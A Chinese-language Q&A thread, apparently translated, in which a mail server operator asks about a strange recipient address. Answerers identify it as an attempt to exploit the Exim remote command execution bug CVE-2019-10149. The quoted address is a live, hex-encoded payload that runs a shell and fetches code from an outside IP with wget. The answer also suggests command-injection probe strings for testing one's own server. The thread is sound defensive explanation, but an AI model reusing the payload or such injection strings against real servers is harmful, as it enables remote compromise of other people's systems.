我操作自己的邮件服务器,有时,人们会向根帐户发送垃圾邮件或神秘内容。最近,我收到一封空邮件,地址是:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld _
该字符串中的第二个 IP 地址似乎归我租用服务器的同一托管服务所有。run和wget在我看来非常可疑,但我在 Internet 上没有发现任何关于此类攻击的信息。
根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。但是,发件人字段设置为[email protected]。
有谁知道,这是什么意思?
这是试图利用最近在 Exim4 SMTP 服务器(v4.87 到 v4.91)中发现的错误,这将允许远程命令执行,因为 Exim 会
${variable}在某些地方扩展替换,而这实际上是不应该的。(此语法在主 Exim 配置文件中广泛使用。)该错误被称为CVE-2019-10149(它还没有商标名称或徽标)。如果您使用的是发行版中的 Exim4,那么您应该已经收到了补丁。由于您使用的是 Postfix,因此它首先不会影响您。
(也就是说,即使在 Postfix 中, 之后的参数
+也经常用作命令行的一部分,例如在调用 Procmail 时。我可能会建议对您自己的服务器进行一些测试,以了解它如何处理诸如someuser+$(blah)@或之类的事情someuser+`blah`@。)